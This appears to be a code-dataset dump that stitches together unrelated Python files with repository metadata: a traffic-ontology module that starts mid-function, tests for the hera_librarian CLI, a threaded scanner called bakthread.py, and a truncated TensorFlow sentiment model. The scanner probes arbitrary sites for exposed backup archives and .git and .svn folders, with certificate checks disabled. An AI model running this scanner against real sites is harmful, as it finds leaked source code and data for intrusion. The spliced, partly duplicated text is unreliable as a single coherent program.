represents the string represention of the CP. If format is csv, it returns a string of ;-separated CSV lines including a file header of the format 'Start Time;End Time;Criticality Phenomenon;Subject(s);Object(s)[;Visualizable In Scene]'. :param cps: A list of criticality phenomena :param output_format: "natural" or ("csv" or "csv-file" (no difference)) :param world: The world with the traffic model of the CP list :param print_non_visualizable_info: Whether to check if CPs :return: A string with each line representing a criticality phenomenon """ output = "" scene_cps = [] if print_non_visualizable_info and world: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, world) scenes = list(filter(lambda x: tm.Scene in x.is_a, world.search(type=tm.Scenario)[0].has_traffic_model)) for scene in scenes: scene_cps += [cp for cp in cps if cp.is_representable_in_scene(scene)] if output_format == "natural": output += "Result:\n" elif output_format == "csv" or output_format == "csv-file": csv_header = "Start Time;End Time;Criticality Phenomenon;Subject(s);Object(s)" if print_non_visualizable_info and world: csv_header += ";Visualizable In Scene" output += csv_header + "\n" if len(cps) > 0: for cp in cps: if output_format == "natural": visualizable = "" if print_non_visualizable_info and world: if cp not in scene_cps: visualizable = "[Non visualizable] " output += visualizable + str(cp) + "\n" elif output_format == "csv" or output_format == "csv-file": visualizable = "" if print_non_visualizable_info and world: visualizable = ";" + str(cp in scene_cps) output += cp.to_csv() + visualizable + "\n" elif output_format == "natural": output += "No criticality phenomenon found.\n" return output[:-1] def _get_individual_id(individual) -> str: """ Returns a unique identifier as string for the given individual. :param individual: The individual to get the ID for. :return: A string representing the ID. """ if hasattr(individual, "identifier") and (isinstance(individual.identifier, list) and len(individual.identifier) > 0 and type(individual.identifier[0]) in [int, str]) or ( type(individual.identifier) in [int, str]): return str(individual.identifier[0]) else: return str(individual) def get_most_specific_classes(list_of_individuals, caching=True): """ Helper function that looks up the subsumption hierarchy and returns the most specific classes of a list of individuals(i.e. removes all classes that are a parent of some class of the individuals). It looks only at the subsumption hierarchy spanned by the domain (L1-L6) and perception, physics, and act ontologies. :param list_of_individuals: A list of individuals :return: A list of tuples containing the individual in the first entry and a list of most specific classes in the second entry (as strings) """ res = [] noncached_list_of_individuals = [] if caching: for i in list_of_individuals: if i in _CACHED_CP_CLASSES.keys(): i_id = _get_individual_id(i) res.append((i_id, _CACHED_CP_CLASSES[i])) else: noncached_list_of_individuals.append(i) relevant_iris = [auto.auto.Ontology.L1_Core.value, auto.auto.Ontology.L2_Core.value, auto.auto.Ontology.L3_Core.value, auto.auto.Ontology.L4_Core.value, auto.auto.Ontology.L5_Core.value, auto.auto.Ontology.L6_Core.value, auto.auto.Ontology.L1_DE.value, auto.auto.Ontology.L2_DE.value, auto.auto.Ontology.L3_DE.value, auto.auto.Ontology.L4_DE.value, auto.auto.Ontology.L5_DE.value, auto.auto.Ontology.L6_DE.value] relevant_additional_iris = [auto.auto.Ontology.Perception.value, auto.auto.Ontology.Physics.value, auto.auto.Ontology.Act.value] for individual in noncached_list_of_individuals: relevant_classes = [x for x in individual.namespace.ontology.classes() if x.namespace.base_iri in relevant_iris] relevant_additional_classes = [x for x in individual.namespace.ontology.classes() if x.namespace.base_iri in relevant_additional_iris] individual_clss = list(filter(lambda x: x in relevant_classes, individual.INDIRECT_is_a)) if len(individual_clss) == 0: # Retry finding something outside of domain ontologies, e.g. physics individual_clss = list(filter(lambda x: x in relevant_additional_classes, individual.INDIRECT_is_a)) individual_id = _get_individual_id(individual) most_specific_individual_clss = [str(individual_cls) for individual_cls in individual_clss if hasattr(individual_cls, "__subclasses__") and len( set(individual_cls.__subclasses__()).intersection(set(individual_clss))) == 0] res.append((individual_id, most_specific_individual_clss)) if caching: _CACHED_CP_CLASSES[individual] = most_specific_individual_clss return res
53.31454
120
0.611009
import logging import owlready2 import tqdm import auto.auto logger = logging.getLogger(__name__) _CACHED_CP_CLASSES = dict() class Criticality_Phenomenon: def __init__(self, traffic_model, cp, cp_cls, objects=None): """ Constructor for criticality phenomena. Information about criticality phenomena are stored as follows: - traffic_model: The scene or scenario in which the CP occurs. - cp: The CP individual from the ontology (owlready2 object). - cp_cls: The class of the criticality phenomenon from the ontology (owlready2 class). - time: Either an interval tuple (start, end) or a time point as float. - subjects: A list of subjects (individuals within the ontology) of the CP. - objects: A dictionary mapping object properties to lists of objects (individuals within the ontology), e.g. {"prop1": [obj1, obj2], "prop2": [obj2, obj3]}. :param traffic_model: The scene or scenario in which the criticality phenomenon occurs. :param cp: An individual from the ABox that is a criticality phenomenon :param cp_cls: The class of the TBox of the criticality phenomenon (i.e. of cp) :param objects: If the objects of the criticality phenomenon were already extracted previously, they can be passed here as a dict, assigning each object property (str) a list of objects, e.g. {"prop1": [obj1, obj2], "prop2": [obj2, obj3]}. If None is given, objects will be extracted in the constructor. """ self.traffic_model = traffic_model self.cp = cp self.cp_cls = cp_cls self.time = 0 ac = auto.auto.get_ontology(auto.auto.Ontology.Act, self.cp.namespace.world) # Subjects if len(self.cp_cls.subject_extraction_code) > 0: try: local_dict = {"subject": self.cp, "subjects": []} exec(self.cp_cls.subject_extraction_code[0], globals(), local_dict) self.subjects = local_dict["subjects"] or [] except Exception as e: logger.error("Invalid subject extraction code in OWL during CP extraction of: " + str(self.cp) + " (" + str(self.cp_cls) + "): " + str(e)) self.subjects = [] elif ac.Activity in self.cp.INDIRECT_is_a and len(self.cp.conducted_by) > 0: self.subjects = self.cp.conducted_by else: self.subjects = [self.cp] # Predicate self.predicate = str(self.cp_cls).replace("criticality_phenomena.", "") if len(self.cp_cls.label.en) > 0: self.predicate += " (" + self.cp_cls.label.en[0] + ")" # Objects if objects is None and len(self.cp_cls.object_extraction_code) > 0: try: local_dict = {"subject": self.cp, "objects": []} exec(self.cp_cls.object_extraction_code[0], globals(), local_dict) self.objects = local_dict["objects"] or [] except Exception as e: logger.error("Invalid object extraction code in OWL during CP extraction of: " + str(self.cp) + " (" + str(self.cp_cls) + "): " + str(e)) self.objects = [] elif objects is None and ac.Activity in self.cp.INDIRECT_is_a: self.objects = {"participants": self.cp.has_participant} else: self.objects = objects or dict() def __str__(self) -> str: """ Returns a string representation of the criticality phenomenon in the form 't = X: subject(s) -- predicate --> object(s)'. :return: String representation as described above. """ # Time label = "t = " + str(self.at_time()) + ": " # Subjects if len(self.subjects) > 0: subj_and_classes = get_most_specific_classes(self.subjects) label += ", ".join([str(x[0]) + " (" + ", ".join(x[1]) + ")" for x in subj_and_classes]) + " -- " # Predicate label += self.predicate # Objects for obj_predicate in self.objects.keys(): obj_and_classes = get_most_specific_classes(self.objects[obj_predicate]) label += " -- " + obj_predicate + " --> " + ", ".join([str(x[0]) + " (" + ", ".join(x[1]) + ")" for x in obj_and_classes]) return label def to_csv(self) -> str: """ Returns a CSV representation (semicolon-separated) of the criticality phenomenon in the form 'time; predicate; subject(s); object(s)'. :return: CSV as a string as described above """ # Time time = self.at_time() if isinstance(time, tuple): start, end = time else: start, end = time, time csv_res = str(start) + ";" + str(end) + ";" # Predicate csv_res += self.predicate + ";" # Subjects if len(self.subjects) > 0: subj_and_classes = get_most_specific_classes(self.subjects) csv_res += ", ".join([str(x[0]) + " (" + ", ".join(x[1]) + ")" for x in subj_and_classes]) csv_res += ";" # Objects for obj_predicate in self.objects.keys(): obj_and_classes = get_most_specific_classes(self.objects[obj_predicate]) csv_res += obj_predicate + ": " + ", ".join([str(x[0]) + " (" + ", ".join(x[1]) + ")" for x in obj_and_classes]) + " | " if csv_res.endswith(" | "): csv_res = csv_res[:-3] return csv_res def at_time(self): """ Interface: returns the time at which the criticality phenomenon is occurring. :return: The time at which self occurs. """ return self.time def is_representable_in_scene(self, scene) -> bool: """ Returns True iff the criticality phenomenon is visualizable or representable in a given scene, i.e. iff all subjects and objects of the phenomenon are within the scene. :param scene: The scene to check against. :return: True iff self is representable in scene. """ if len(self.subjects) > 0: for subj in self.subjects + [y for x in self.objects.values() for y in x]: if scene not in subj.in_traffic_model: return False return True return False class Scene_Criticality_Phenomenon(Criticality_Phenomenon): """ Concretization for scene-level criticality phenomena. Note that member traffic_model is a list of scenes. """ def __init__(self, traffic_model: list, cp, cp_cls, objects=None): if len(traffic_model) == 0: raise ValueError("Scene CP with scenes") Criticality_Phenomenon.__init__(self, traffic_model, cp, cp_cls, objects) self.time = traffic_model[0].inTimePosition[0].numericPosition[0] class Scenario_Criticality_Phenomenon(Criticality_Phenomenon): """ Concretization for scenario-level criticality phenomena. """ def __init__(self, traffic_model, cp, cp_cls, objects=None): Criticality_Phenomenon.__init__(self, traffic_model, cp, cp_cls, objects) if hasattr(self.cp, "hasBeginning") and hasattr(self.cp, "hasEnd") and len(self.cp.hasBeginning) > 0 and \ len(self.cp.hasBeginning[0].inTimePosition) > 0 and \ len(self.cp.hasBeginning[0].inTimePosition[0].numericPosition) > 0 and len(self.cp.hasEnd) > 0 and \ len(self.cp.hasEnd[0].inTimePosition) > 0 and \ len(self.cp.hasEnd[0].inTimePosition[0].numericPosition) > 0: self.time = (self.cp.hasBeginning[0].inTimePosition[0].numericPosition[0], self.cp.hasEnd[0].inTimePosition[0].numericPosition[0]) else: self.time = (self.traffic_model.hasBeginning[0].inTimePosition[0].numericPosition[0], self.traffic_model.hasEnd[0].inTimePosition[0].numericPosition[0]) def phenomena_scenario(scenario: list or owlready2.World) -> list: """ scenario: Either a list of worlds, each world representing a single scene or a single world representing a whole scenario returns: A list of criticality phenomena objects (either scene or scenario) sorted by temporal occurrence """ cps = [] if type(scenario) == list: for scene in scenario: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, scene) cp_ont = auto.auto.get_ontology(auto.auto.Ontology.Criticality_Phenomena, scene) scenes = list(tm.search(type=tm.Scene)) if len(scenes) > 0: for scene_cp in scenario.search(type=cp_ont.Criticality_Phenomenon): scene_cp_obj = Scene_Criticality_Phenomenon(scenes[0], scene_cp, None) # TODO cps.append(scene_cp_obj) else: raise ValueError("No scenes found in scene world " + str(scene)) elif type(scenario) == owlready2.World: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, scenario) ac = auto.auto.get_ontology(auto.auto.Ontology.Act, scenario) ti = auto.auto.get_ontology(auto.auto.Ontology.Time, scenario) cp_ont = auto.auto.get_ontology(auto.auto.Ontology.Criticality_Phenomena, scenario) scenarios = list(scenario.search(type=tm.Scenario)) if len(scenarios) > 0: if logger.level == logging.DEBUG: search_space = tqdm.tqdm(list(scenario.search(type=cp_ont.Criticality_Phenomenon))) else: search_space = scenario.search(type=cp_ont.Criticality_Phenomenon) for cp in search_space: cp_clss = list(filter(lambda x: x in scenario.classes(), [y for y in cp.INDIRECT_is_a if hasattr(y, "namespace") and y.namespace.base_iri == "http://purl.org/auto/criticality_phenomena#"])) most_specific_cp_clss = [cp_cls for cp_cls in cp_clss if hasattr(cp_cls, "__subclasses__") and len(set(cp_cls.__subclasses__()).intersection(set(cp_clss))) == 0] for cp_cls in most_specific_cp_clss: objects = [None] if len(cp_cls.object_extraction_code) > 0: try: local_dict = {"subject": cp, "subjects": []} exec(cp_cls.object_extraction_code[0], globals(), local_dict) objects = local_dict["objects"] or [] except Exception as e: logger.error("Invalid object extraction code in OWL during CP extraction of: " + str(cp) + " (" + str(cp_cls) + "): " + str(e)) for object_dict in objects: if set(cp.INDIRECT_is_a).intersection({ac.Activity, ti.Interval}): scenario_cp_obj = Scenario_Criticality_Phenomenon(scenarios[0], cp, cp_cls, object_dict) cps.append(scenario_cp_obj) elif len(cp.in_traffic_model) > 0 and tm.Scene in cp.in_traffic_model[0].INDIRECT_is_a: scene_cp_obj = Scene_Criticality_Phenomenon(cp.in_traffic_model, cp, cp_cls, object_dict) cps.append(scene_cp_obj) else: raise ValueError("CP with no scene or scenario found: " + str(cp)) else: raise ValueError("No scenario found in scenario world " + str(scenario)) else: raise ValueError("Wrong scenario type: neither a list nor a world, but found " + str(type(scenario))) cps.sort(key=lambda x: x.time if type(x) is Scene_Criticality_Phenomenon else x.time[0]) return cps def list_cps(cps: list, output_format="natural", world=None, print_non_visualizable_info=False) -> str: """ Lists the given criticality phenomena in a given output format. If a world is given, checks if the phenomena are visualizable in the traffic model of the world. If format is natural, it returns a string of lines where each line represents the string represention of the CP. If format is csv, it returns a string of ;-separated CSV lines including a file header of the format 'Start Time;End Time;Criticality Phenomenon;Subject(s);Object(s)[;Visualizable In Scene]'. :param cps: A list of criticality phenomena :param output_format: "natural" or ("csv" or "csv-file" (no difference)) :param world: The world with the traffic model of the CP list :param print_non_visualizable_info: Whether to check if CPs :return: A string with each line representing a criticality phenomenon """ output = "" scene_cps = [] if print_non_visualizable_info and world: tm = auto.auto.get_ontology(auto.auto.Ontology.Traffic_Model, world) scenes = list(filter(lambda x: tm.Scene in x.is_a, world.search(type=tm.Scenario)[0].has_traffic_model)) for scene in scenes: scene_cps += [cp for cp in cps if cp.is_representable_in_scene(scene)] if output_format == "natural": output += "Result:\n" elif output_format == "csv" or output_format == "csv-file": csv_header = "Start Time;End Time;Criticality Phenomenon;Subject(s);Object(s)" if print_non_visualizable_info and world: csv_header += ";Visualizable In Scene" output += csv_header + "\n" if len(cps) > 0: for cp in cps: if output_format == "natural": visualizable = "" if print_non_visualizable_info and world: if cp not in scene_cps: visualizable = "[Non visualizable] " output += visualizable + str(cp) + "\n" elif output_format == "csv" or output_format == "csv-file": visualizable = "" if print_non_visualizable_info and world: visualizable = ";" + str(cp in scene_cps) output += cp.to_csv() + visualizable + "\n" elif output_format == "natural": output += "No criticality phenomenon found.\n" return output[:-1] def _get_individual_id(individual) -> str: """ Returns a unique identifier as string for the given individual. :param individual: The individual to get the ID for. :return: A string representing the ID. """ if hasattr(individual, "identifier") and (isinstance(individual.identifier, list) and len(individual.identifier) > 0 and type(individual.identifier[0]) in [int, str]) or ( type(individual.identifier) in [int, str]): return str(individual.identifier[0]) else: return str(individual) def get_most_specific_classes(list_of_individuals, caching=True): """ Helper function that looks up the subsumption hierarchy and returns the most specific classes of a list of individuals(i.e. removes all classes that are a parent of some class of the individuals). It looks only at the subsumption hierarchy spanned by the domain (L1-L6) and perception, physics, and act ontologies. :param list_of_individuals: A list of individuals :return: A list of tuples containing the individual in the first entry and a list of most specific classes in the second entry (as strings) """ res = [] noncached_list_of_individuals = [] if caching: for i in list_of_individuals: if i in _CACHED_CP_CLASSES.keys(): i_id = _get_individual_id(i) res.append((i_id, _CACHED_CP_CLASSES[i])) else: noncached_list_of_individuals.append(i) relevant_iris = [auto.auto.Ontology.L1_Core.value, auto.auto.Ontology.L2_Core.value, auto.auto.Ontology.L3_Core.value, auto.auto.Ontology.L4_Core.value, auto.auto.Ontology.L5_Core.value, auto.auto.Ontology.L6_Core.value, auto.auto.Ontology.L1_DE.value, auto.auto.Ontology.L2_DE.value, auto.auto.Ontology.L3_DE.value, auto.auto.Ontology.L4_DE.value, auto.auto.Ontology.L5_DE.value, auto.auto.Ontology.L6_DE.value] relevant_additional_iris = [auto.auto.Ontology.Perception.value, auto.auto.Ontology.Physics.value, auto.auto.Ontology.Act.value] for individual in noncached_list_of_individuals: relevant_classes = [x for x in individual.namespace.ontology.classes() if x.namespace.base_iri in relevant_iris] relevant_additional_classes = [x for x in individual.namespace.ontology.classes() if x.namespace.base_iri in relevant_additional_iris] individual_clss = list(filter(lambda x: x in relevant_classes, individual.INDIRECT_is_a)) if len(individual_clss) == 0: # Retry finding something outside of domain ontologies, e.g. physics individual_clss = list(filter(lambda x: x in relevant_additional_classes, individual.INDIRECT_is_a)) individual_id = _get_individual_id(individual) most_specific_individual_clss = [str(individual_cls) for individual_cls in individual_clss if hasattr(individual_cls, "__subclasses__") and len( set(individual_cls.__subclasses__()).intersection(set(individual_clss))) == 0] res.append((individual_id, most_specific_individual_clss)) if caching: _CACHED_CP_CLASSES[individual] = most_specific_individual_clss return res
1,227
6,336
75
fb774c8a7a6083cfa0aad97f1b5c322164dcbec0
3,818
py
Python
bakthread.py
ifuzx/bakscan
3d5e36a390b65e29fe89ec1578bda13f9ac92406
[ "Unlicense" ]
null
null
null
bakthread.py
ifuzx/bakscan
3d5e36a390b65e29fe89ec1578bda13f9ac92406
[ "Unlicense" ]
null
null
null
bakthread.py
ifuzx/bakscan
3d5e36a390b65e29fe89ec1578bda13f9ac92406
[ "Unlicense" ]
null
null
null
import re import requests import threading import queue as Queue from requests.packages.urllib3.exceptions import InsecureRequestWarning
33.491228
138
0.499214
import re import requests import threading import queue as Queue from requests.packages.urllib3.exceptions import InsecureRequestWarning class myThread(threading.Thread): def __init__(self, name, q): threading.Thread.__init__(self) self.name = name self.q = q def run(self): while True: try: bakburp(self.name, self.q) except: break def bakburp(threadName, q): geturl = q.get(timeout=10) html="" try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) conn = requests.get(geturl,verify=False, allow_redirects=False,timeout=30) conn.encoding = 'utf-8' html = conn.status_code s = requests.session() if html == 200: err = len(conn.content) if err < 1000000: print('\r'+f'\033[33m[*]\033[33mCode:%s -----(可能误报)--大小:%s ----- 目标:%s \n' % (html,err,geturl),end='', flush=True) else: print('\r'+f'\033[32m[*]\033[32m Code:%s ----- 文件存在--大小:%s ----- 目标:%s \n' % (html, err, geturl), end='',flush=True) # print('Code:%s ----- 文件存在--大小:%s ----- 目标:%s' % (html, err, geturl) ) s.close() conn.close() else: print('\r'+geturl+'\r',end='', flush=True) s.close() conn.close() except Exception as e: print('\r'+geturl+'\r',end='', flush=True) def run(): headers = { 'Upgrade-Insecure-Requests': '1', 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36' } inurl = {"/www.zip", "/www.rar", "/www.tar.gz", "/wwwroot.zip", "/wwwroot.rar", "/wwwroot.tar.gz", "/web.zip", "/web.rar", "/web.tar.gz", "/.svn" , "/.git" , "/.DS_Store", "/1.zip", "/1.rar","/1.rar" } hz = {".zip", ".rar", ".tar.gz"} threadLock = threading.Lock() link_list = open(r'./runoob.txt', 'r').readlines() newlink_list =[] data = [] for i in link_list: i=i.replace("\n","") for s in inurl: url = i + s newlink_list.append(url) compile_rule = re.compile(r'(?<![\.\d])(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])') # if re.compile(r'\d+[\.]\d+[\.]\d+[\.]\d+',) if re.findall(compile_rule, i): continue if i.startswith("https://"): ex_domain = i.replace("https://", "").split('.') # print(ex_domain) for index in hz: url = i +'/' + i.replace("https://", "") + index newlink_list.append(url) for top in ex_domain: for end in hz: url = i + '/' + top + end newlink_list.append(url) elif i.startswith("http://"): ex_domain = i.replace("http://", "").split('.') for index in hz: url = i + '/' + i.replace("http://", "") + index newlink_list.append(url) for top in ex_domain: for end in hz: url = i + '/'+ top+end newlink_list.append(url) # for i in newlink_list: # print(i) # 创建50个线程名 thnum = 100 threadList = [] num=0 while num <= thnum: threadList.append("thread" + str(num)) num+=1 # 设置队列长度 workQueue = Queue.Queue(3000) # 线程池# 创建新线程 threads = [] for tName in threadList: thread = myThread(tName, workQueue) thread.start() # threadLock.acquire() # threadLock.release() threads.append(thread) # 将url填充到队列 for url in newlink_list: workQueue.put(url) # 等待所有线程完成 for t in threads: t.join() print("end")
3,685
12
122
e9bfb50a19a589a69f5030410dca17dc1c9ab50c
3,539
py
Python
hera_librarian/tests/test_cli.py
BrianJKoopman/librarian
2d4164b60fe41d1a192f03d8baad12c0d11d0394
[ "BSD-2-Clause" ]
5
2016-02-17T17:51:05.000Z
2021-12-09T19:08:17.000Z
hera_librarian/tests/test_cli.py
BrianJKoopman/librarian
2d4164b60fe41d1a192f03d8baad12c0d11d0394
[ "BSD-2-Clause" ]
60
2016-01-29T20:40:04.000Z
2021-05-28T14:13:18.000Z
hera_librarian/tests/test_cli.py
simonsobs/librarian
188370d84a988f898bb9de4593078c1868602f08
[ "BSD-2-Clause" ]
6
2017-11-13T10:40:34.000Z
2020-07-10T00:42:57.000Z
# -*- mode: python; coding: utf-8 -*- # Copyright 2019 the HERA Collaboration # Licensed under the 2-clause BSD License """Test code in hera_librarian/cli.py """ import pytest import os import hera_librarian from hera_librarian import cli
26.214815
81
0.65414
# -*- mode: python; coding: utf-8 -*- # Copyright 2019 the HERA Collaboration # Licensed under the 2-clause BSD License """Test code in hera_librarian/cli.py """ import pytest import os import hera_librarian from hera_librarian import cli def test_die(capsys): # test without specifying replacement args with pytest.raises(SystemExit) as e: cli.die("my error") captured = capsys.readouterr() assert e.type == SystemExit assert e.value.code == 1 assert captured.err == "error: my error\n" # test with replacement args with pytest.raises(SystemExit) as e: cli.die("my %s", "error") captured = capsys.readouterr() assert e.type == SystemExit assert e.value.code == 1 assert captured.err == "error: my error\n" return def test_print_table(capsys): # define dicts dict1 = {"name": "foo", "size": 10} dict2 = {"name": "bar", "size": 12} dict_list = [dict1, dict2] col_list = ["name", "size"] col_names = ["Name of file", "Size of file"] # test without specifying order cli.print_table(dict_list) captured = capsys.readouterr() stdout = captured.out correct_table = """name | size ---- | ---- foo | 10 bar | 12 """ assert stdout == correct_table # test without column names cli.print_table(dict_list, col_list) captured = capsys.readouterr() stdout = captured.out assert stdout == correct_table # test with column names cli.print_table(dict_list, col_list, col_names) captured = capsys.readouterr() stdout = captured.out correct_table = """Name of file | Size of file ------------ | ------------ foo | 10 bar | 12 """ assert stdout == correct_table # test using the wrong number of column headers with pytest.raises(ValueError): cli.print_table(dict_list, col_list, col_names[:1]) return def test_sizeof_fmt(): # test a few known values bts = 512 assert cli.sizeof_fmt(bts) == "512.0 B" bts = 1024 assert cli.sizeof_fmt(bts) == "1.0 kB" bts = 1024**2 assert cli.sizeof_fmt(bts) == "1.0 MB" bts = 1024**3 assert cli.sizeof_fmt(bts) == "1.0 GB" bts = 1024**4 assert cli.sizeof_fmt(bts) == "1.0 TB" bts = 1024**5 assert cli.sizeof_fmt(bts) == "1.0 PB" bts = 1024**6 assert cli.sizeof_fmt(bts) == "1.0 EB" bts = 1024**7 assert cli.sizeof_fmt(bts) == "1.0 ZB" bts = 1024**8 assert cli.sizeof_fmt(bts) == "1.0 YB" return def test_generate_parser(): ap = cli.generate_parser() # make sure we have all the subparsers we're expecting available_subparsers = tuple(ap._subparsers._group_actions[0].choices.keys()) assert "add-file-event" in available_subparsers assert "add-obs" in available_subparsers assert "launch-copy" in available_subparsers assert "assign-sessions" in available_subparsers assert "delete-files" in available_subparsers assert "locate-file" in available_subparsers assert "initiate-offload" in available_subparsers assert "offload-helper" in available_subparsers assert "search-files" in available_subparsers assert "set-file-deletion-policy" in available_subparsers assert "stage-files" in available_subparsers assert "upload" in available_subparsers return def test_main(script_runner): version = hera_librarian.__version__ ret = script_runner.run("librarian", "-V") assert ret.stdout == "librarian {}\n".format(version)
3,177
0
115
15f861d098e92c2a6abe585f495d1e9b5cf29ce8
8,031
py
Python
models/architectures.py
hsqmlzno1/Transferable-E2E-ABSA
6083af24892c93703ed6695aff277d54d4b426c6
[ "MIT" ]
73
2019-08-14T09:25:02.000Z
2022-03-25T07:19:45.000Z
models/architectures.py
hsqmlzno1/Transferable-E2E-ABSA
6083af24892c93703ed6695aff277d54d4b426c6
[ "MIT" ]
3
2020-02-25T06:39:52.000Z
2020-12-26T12:40:23.000Z
models/architectures.py
hsqmlzno1/Transferable-E2E-ABSA
6083af24892c93703ed6695aff277d54d4b426c6
[ "MIT" ]
13
2019-09-22T03:45:21.000Z
2021-11-22T06:52:28.000Z
import tensorflow as tf from nn_utils import * import numpy as np import nn_utils
48.08982
163
0.528826
import tensorflow as tf from nn_utils import * import numpy as np import nn_utils class SuperNN(object): def __init__(self, args, word2vec, init=None, scope=None): self.args = args self.word2vec = word2vec self.init = init self.scope = scope self.hops = args.hops self.max_len = args.max_len self.input_win = args.input_win self.dim_w = args.dim_w self.dim_asp_h = args.dim_asp_h self.dim_opn_h = args.dim_opn_h self.dim_ts_h = args.dim_ts_h self.dim_rel = args.dim_rel self.dim_ote_y = args.dim_ote_y self.dim_ts_y = args.dim_ts_y self.dim_lm_y = args.dim_lm_y self.ote_tag_vocab = args.ote_tag_vocab self.ts_tag_vocab = args.ts_tag_vocab self.build_vars() def build_vars(self): with tf.variable_scope(self.scope): self.Wa = tf.Variable(self.init([2*self.dim_asp_h+2*self.dim_asp_h, 2*self.dim_asp_h]), name='Wa') self.Wo = tf.Variable(self.init([2*self.dim_asp_h+2*self.dim_opn_h, 2*self.dim_asp_h]), name='Wo') self.bias_a = tf.Variable(self.init([2*self.dim_asp_h, ]), name='bias_a') self.bias_o = tf.Variable(self.init([2*self.dim_asp_h, ]), name='bias_o') # relation matrices between aspect&aspect, opinion&opinion, aspect&opinion self.Ta = tf.Variable(self.init([self.dim_rel, 2*self.dim_asp_h, 2*self.dim_asp_h]), name='Ta') self.To = tf.Variable(self.init([self.dim_rel, 2*self.dim_opn_h, 2*self.dim_opn_h]), name='To') self.Tao = tf.Variable(self.init([self.dim_rel, 2*self.dim_asp_h, 2*self.dim_opn_h]), name='Tao') self.va = tf.Variable(self.init([2*self.dim_rel]), name='v_a') self.vo = tf.Variable(self.init([2*self.dim_rel]), name='v_o') def __call__(self, win_reviews, batch_length, ma_0, mo_0, dropout_rate, reuse=False): with tf.variable_scope(self.scope, reuse=reuse): with tf.variable_scope("Embedding_layer"): mask = tf.cast(tf.sign(win_reviews), tf.float32) self.input_emb = tf.nn.embedding_lookup(self.word2vec, win_reviews) #(b, m, win, d) self.input_emb = tf.nn.dropout(self.input_emb, dropout_rate) with tf.variable_scope('LSTM-OTE'): fw_cell = tf.contrib.rnn.LSTMCell(self.dim_asp_h) bw_cell = tf.contrib.rnn.LSTMCell(self.dim_asp_h) outputs, states = tf.nn.bidirectional_dynamic_rnn(fw_cell, bw_cell, self.input_emb, sequence_length=batch_length, dtype=tf.float32) asp_h = tf.concat(outputs, -1) #(b, m, 2*dim_asp_h) with tf.variable_scope('Attention'): ma_t = tf.tile(ma_0, [tf.shape(asp_h)[0], 1]) #(b, 2*dim_asp_h) mo_t = tf.tile(mo_0, [tf.shape(asp_h)[0], 1]) #(b, 2*dim_opn_h) za_list, zo_list = [], [] ma_list, mo_list = [], [] ma_list.append(ma_t) # (b, 2*dim_asp_h) mo_list.append(mo_t) # (b, 2*dim_opn_h) for l in range(self.hops): za = tf.concat([self.tensor_product(asp_h, ma_t, self.Ta, self.Wa, self.bias_a, dropout_rate), #(b, m, 2*dim_rel) self.tensor_product(asp_h, mo_t, self.Tao, self.Wo, self.bias_o, dropout_rate)], #(b, m, 2*dim_rel) -1) #(b, m, 2*dim_rel) zo = tf.concat([self.tensor_product(asp_h, mo_t, self.To, self.Wo, self.bias_o, dropout_rate), #(b, m, 2*dim_rel) self.tensor_product(asp_h, ma_t, tf.transpose(self.Tao, [0, 2, 1]), self.Wa, self.bias_a, dropout_rate)], #(b, m, 2*dim_rel) -1) #(b, m, 2*dim_rel) za_l = tf.reshape(za, [-1, 2*self.dim_rel]) #(b*m, 2*dim_rel) zo_l = tf.reshape(zo, [-1, 2*self.dim_rel]) #(b*m, 2*dim_rel) za_list.append(za_l) zo_list.append(zo_l) ea_l = tf.reduce_sum(tf.multiply(za_l, self.va), -1) #(b*m) eo_l = tf.reduce_sum(tf.multiply(zo_l, self.vo), -1) #(b*m) ea_l = tf.reshape(ea_l, [-1, self.max_len]) #(b,m) eo_l = tf.reshape(eo_l, [-1, self.max_len]) #(b,m) alpha_a = tf.expand_dims(nn_utils.mask_softmax(ea_l, axis=1, mask=mask), -1) #(b,m,1) alpha_o = tf.expand_dims(nn_utils.mask_softmax(eo_l, axis=1, mask=mask), -1) #(b,m,1) a_summary = tf.reduce_sum(asp_h * alpha_a, 1) #(b, 2*dim_ote_h) ma_t = ma_t + a_summary o_summary = tf.reduce_sum(asp_h * alpha_o, 1) #(b, 2*dim_ote_h) mo_t = mo_t + o_summary ma_list.append(ma_t) #(b, 2*dim_asp_h) mo_list.append(mo_t) #(b, 2*dim_opn_h) asp_h = za_list[-1] opn_h = zo_list[-1] asp_h = tf.reshape(asp_h, [-1, self.max_len, 2*self.dim_rel]) opn_h = tf.reshape(opn_h, [-1, self.max_len, 2*self.dim_rel]) with tf.variable_scope('LSTM-TS'): fw_cell = tf.contrib.rnn.LSTMCell(self.dim_ts_h) bw_cell = tf.contrib.rnn.LSTMCell(self.dim_ts_h) outputs, states = tf.nn.bidirectional_dynamic_rnn(fw_cell, bw_cell, asp_h, sequence_length=batch_length, dtype=tf.float32) ts_h = tf.concat(outputs, -1) #(b, m, 2*dim_opn_h) with tf.variable_scope('FC_layer'): asp_h = tf.nn.dropout(asp_h, dropout_rate) #(b, m, 2*dim_ote) opn_h = tf.nn.dropout(opn_h, dropout_rate) #(b, m, 2*dim_ts) ts_h = tf.nn.dropout(ts_h, dropout_rate) #(b, m, 2*dim_asp_h+2*dim_opn_h) asp_h = tf.reshape(asp_h, [-1, asp_h.shape.as_list()[-1]]) opn_h = tf.reshape(opn_h, [-1, opn_h.shape.as_list()[-1]]) ts_h = tf.reshape(ts_h, [-1, ts_h.shape.as_list()[-1]]) asp_pred = nn_utils.fc_layer(asp_h, output_dim=self.dim_ote_y, scope="asp_tagger", reuse=reuse) opn_pred = nn_utils.fc_layer(opn_h, output_dim=self.dim_lm_y, scope="opn_tagger", reuse=reuse) ts_pred = nn_utils.fc_layer(ts_h, output_dim=self.dim_ts_y, scope="ts_tagger", reuse=reuse) return asp_h, ts_h, asp_pred, opn_pred, ts_pred, a_summary, o_summary, tf.squeeze(alpha_a, 2), tf.squeeze(alpha_o, 2) def tensor_product(self, a, b, T, W, bias, dropout_rate, activation=None): _, element_size, a_dim = a.shape.as_list() _, b_dim = b.shape.as_list() emb_dim = T.shape.as_list()[-1] T_dropout = tf.nn.dropout(T, dropout_rate) a_re = tf.reshape(a, [-1, a_dim]) #(b*m, d_a) b_tile = tf.tile(tf.expand_dims(b, 1), [1, element_size, 1]) #(b, m, d_b) 